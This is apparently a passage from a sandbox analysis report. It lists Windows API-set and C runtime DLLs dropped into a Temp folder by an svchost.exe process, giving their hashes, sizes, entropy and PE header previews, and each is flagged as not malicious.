                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):19248
                                    Entropy (8bit):7.073730829887072
                                    Encrypted:false
                                    SSDEEP:192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
                                    MD5:5F73A814936C8E7E4A2DFD68876143C8
                                    SHA1:D960016C4F553E461AFB5B06B039A15D2E76135E
                                    SHA-256:96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
                                    SHA-512:77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-processthreads-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):19392
                                    Entropy (8bit):7.082421046253008
                                    Encrypted:false
                                    SSDEEP:384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
                                    MD5:A2D7D7711F9C0E3E065B2929FF342666
                                    SHA1:A17B1F36E73B82EF9BFB831058F187535A550EB8
                                    SHA-256:9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
                                    SHA-512:D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-processthreads-l1-1-1.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):18744
                                    Entropy (8bit):7.1156948849491055
                                    Encrypted:false
                                    SSDEEP:384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
                                    MD5:D0289835D97D103BAD0DD7B9637538A1
                                    SHA1:8CEEBE1E9ABB0044808122557DE8AAB28AD14575
                                    SHA-256:91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
                                    SHA-512:97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-profile-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):17712
                                    Entropy (8bit):7.187691342157284
                                    Encrypted:false
                                    SSDEEP:192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
                                    MD5:FEE0926AA1BF00F2BEC9DA5DB7B2DE56
                                    SHA1:F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
                                    SHA-256:8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
                                    SHA-512:0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-rtlsupport-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):17720
                                    Entropy (8bit):7.19694878324007
                                    Encrypted:false
                                    SSDEEP:384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
                                    MD5:FDBA0DB0A1652D86CD471EAA509E56EA
                                    SHA1:3197CB45787D47BAC80223E3E98851E48A122EFA
                                    SHA-256:2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
                                    SHA-512:E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-string-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):18232
                                    Entropy (8bit):7.137724132900032
                                    Encrypted:false
                                    SSDEEP:384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
                                    MD5:12CC7D8017023EF04EBDD28EF9558305
                                    SHA1:F859A66009D1CAAE88BF36B569B63E1FBDAE9493
                                    SHA-256:7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
                                    SHA-512:F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-synch-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):20280
                                    Entropy (8bit):7.04640581473745
                                    Encrypted:false
                                    SSDEEP:384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
                                    MD5:71AF7ED2A72267AAAD8564524903CFF6
                                    SHA1:8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
                                    SHA-256:5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
                                    SHA-512:7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-synch-l1-2-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):18744
                                    Entropy (8bit):7.138910839042951
                                    Encrypted:false
                                    SSDEEP:384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
                                    MD5:0D1AA99ED8069BA73CFD74B0FDDC7B3A
                                    SHA1:BA1F5384072DF8AF5743F81FD02C98773B5ED147
                                    SHA-256:30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
                                    SHA-512:6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...X*uY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....X*uY........9...T...T.......X*uY........d...............X*uY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...|...............H...................A.....................................api-ms-win-core-synch-

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-sysinfo-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):19248
                                    Entropy (8bit):7.072555805949365
                                    Encrypted:false
                                    SSDEEP:384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
                                    MD5:19A40AF040BD7ADD901AA967600259D9
                                    SHA1:05B6322979B0B67526AE5CD6E820596CBE7393E4
                                    SHA-256:4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
                                    SHA-512:5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-timezone-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):18224
                                    Entropy (8bit):7.17450177544266
                                    Encrypted:false
                                    SSDEEP:384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
                                    MD5:BABF80608FD68A09656871EC8597296C
                                    SHA1:33952578924B0376CA4AE6A10B8D4ED749D10688
                                    SHA-256:24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
                                    SHA-512:3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-core-util-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):18232
                                    Entropy (8bit):7.1007227686954275
                                    Encrypted:false
                                    SSDEEP:192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
                                    MD5:0F079489ABD2B16751CEB7447512A70D
                                    SHA1:679DD712ED1C46FBD9BC8615598DA585D94D5D87
                                    SHA-256:F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
                                    SHA-512:92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-conio-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):19256
                                    Entropy (8bit):7.088693688879585
                                    Encrypted:false
                                    SSDEEP:384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
                                    MD5:6EA692F862BDEB446E649E4B2893E36F
                                    SHA1:84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
                                    SHA-256:9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
                                    SHA-512:9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-convert-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):22328
                                    Entropy (8bit):6.929204936143068
                                    Encrypted:false
                                    SSDEEP:384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
                                    MD5:72E28C902CD947F9A3425B19AC5A64BD
                                    SHA1:9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
                                    SHA-256:3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
                                    SHA-512:58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-environment-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):18736
                                    Entropy (8bit):7.078409479204304
                                    Encrypted:false
                                    SSDEEP:192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
                                    MD5:AC290DAD7CB4CA2D93516580452EDA1C
                                    SHA1:FA949453557D0049D723F9615E4F390010520EDA
                                    SHA-256:C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
                                    SHA-512:B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-filesystem-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):20280
                                    Entropy (8bit):7.085387497246545
                                    Encrypted:false
                                    SSDEEP:384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
                                    MD5:AEC2268601470050E62CB8066DD41A59
                                    SHA1:363ED259905442C4E3B89901BFD8A43B96BF25E4
                                    SHA-256:7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
                                    SHA-512:0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-heap-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):19256
                                    Entropy (8bit):7.060393359865728
                                    Encrypted:false
                                    SSDEEP:192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
                                    MD5:93D3DA06BF894F4FA21007BEE06B5E7D
                                    SHA1:1E47230A7EBCFAF643087A1929A385E0D554AD15
                                    SHA-256:F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
                                    SHA-512:72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-locale-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):18744
                                    Entropy (8bit):7.13172731865352
                                    Encrypted:false
                                    SSDEEP:192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
                                    MD5:A2F2258C32E3BA9ABF9E9E38EF7DA8C9
                                    SHA1:116846CA871114B7C54148AB2D968F364DA6142F
                                    SHA-256:565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
                                    SHA-512:E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................|..O........9...d...d.......|..O........d...............|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-math-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):28984
                                    Entropy (8bit):6.6686462438397
                                    Encrypted:false
                                    SSDEEP:384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
                                    MD5:8B0BA750E7B15300482CE6C961A932F0
                                    SHA1:71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
                                    SHA-256:BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
                                    SHA-512:FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..

                                    C:\Users\user\AppData\Local\Temp\B025A83F\api-ms-win-crt-multibyte-l1-1-0.dll

                                    Download File
                                    Process:C:\Windows\SysWOW64\svchost.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):26424
                                    Entropy (8bit):6.712286643697659
                                    Encrypted:false
                                    SSDEEP:384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V
                                    MD5:35FC66BD813D0F126883E695664E7B83
                                    SHA1:2FD63C18CC5DC4DEFC7EA82F421050E668F68548
                                    SHA-256:66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
                                    SHA-512:65F8397DE5C48D3DF8AD79BAF46C1D3A0761F727E918AE63612EA37D96ADF16CC76D70D454A599F37F9BA9B4E2E38EBC845DF4C74FC1E1131720FD0DCB881431
                                    Malicious:false
